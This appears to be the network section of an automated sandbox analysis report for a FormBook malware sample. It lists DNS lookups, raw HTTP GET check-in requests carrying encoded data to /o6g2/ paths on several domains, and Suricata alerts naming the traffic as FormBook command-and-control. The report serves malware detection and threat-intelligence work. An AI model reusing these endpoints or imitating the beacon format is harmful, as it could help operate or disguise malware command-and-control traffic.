Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.educationacielouvert.com | CNAME educationacielouvert.com | 84.32.84.32 |
www.qysdh1.xyz | 35.244.161.158 | |
www.hydrauliczny.online | 199.59.243.225 | |
GET 200 http://www.qysdh1.xyz/o6g2/?w6A=XUg8FO+nVdlH42qXv6cQzVTq2CnZ0d6dCbTCSKxll3i1vjg3d0RwyGaC9/JEVpNUv7bz2nUz&-ZS=W6O83nah-

Request:

```http
GET /o6g2/?w6A=XUg8FO+nVdlH42qXv6cQzVTq2CnZ0d6dCbTCSKxll3i1vjg3d0RwyGaC9/JEVpNUv7bz2nUz&-ZS=W6O83nah- HTTP/1.1
Host: www.qysdh1.xyz
Connection: close
```

Response:

```http
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Mon, 16 Oct 2023 01:58:33 GMT
Content-Type: text/html
Content-Length: 5208
Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
Vary: Accept-Encoding
ETag: "65267254-1458"
Cache-Control: no-cache
Accept-Ranges: bytes
Via: 1.1 google
Connection: close
```
GET 200 http://www.educationacielouvert.com/o6g2/?w6A=eeE/5eXEYnavNnNDmshcqn1xSUo8zOrK/Ya4aXTZXUIFTrCuM6Tmu8ev7YaAflYE+piVwyda&-ZS=W6O83nah-

Request:

```http
GET /o6g2/?w6A=eeE/5eXEYnavNnNDmshcqn1xSUo8zOrK/Ya4aXTZXUIFTrCuM6Tmu8ev7YaAflYE+piVwyda&-ZS=W6O83nah- HTTP/1.1
Host: www.educationacielouvert.com
Connection: close
```

Response:

```http
HTTP/1.1 200 OK
Server: hcdn
Date: Mon, 16 Oct 2023 01:58:54 GMT
Content-Type: text/html
Content-Length: 10066
Connection: close
Vary: Accept-Encoding
x-hcdn-request-id: 99ccdb688e91217c88015f5a58091f39-srv-edge1
Expires: Mon, 16 Oct 2023 01:58:53 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
```
GET 200 http://www.hydrauliczny.online/o6g2/?w6A=8NW9x49tJV1H9qvd2CBk+oBG7l2hdO9qMKvqNWWs9eYHU8Mmj6uZZUB5FkBqZUv7ofCiF+Pz&-ZS=W6O83nah-

Request:

```http
GET /o6g2/?w6A=8NW9x49tJV1H9qvd2CBk+oBG7l2hdO9qMKvqNWWs9eYHU8Mmj6uZZUB5FkBqZUv7ofCiF+Pz&-ZS=W6O83nah- HTTP/1.1
Host: www.hydrauliczny.online
Connection: close
```

Response:

```http
HTTP/1.1 200 OK
date: Mon, 16 Oct 2023 01:59:14 GMT
content-type: text/html; charset=utf-8
content-length: 1309
x-request-id: 60239d30-e391-4084-8421-d1795b77d46e
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wcEOPZR0vAZ7I/e8aYQO9gJsE6UfhhOH6PK0FTHikBg+gDfi0NKHX7ox3pBes9phoAyJmPA/ManN0TJQQwiz1g==
set-cookie: parking_session=60239d30-e391-4084-8421-d1795b77d46e; expires=Mon, 16 Oct 2023 02:14:14 GMT; path=/
connection: close
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 84.32.84.32:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49167 -> 199.59.243.225:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49165 -> 35.244.161.158:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49165 -> 35.244.161.158:80 | 2031088 | ET HUNTING Request to .XYZ Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts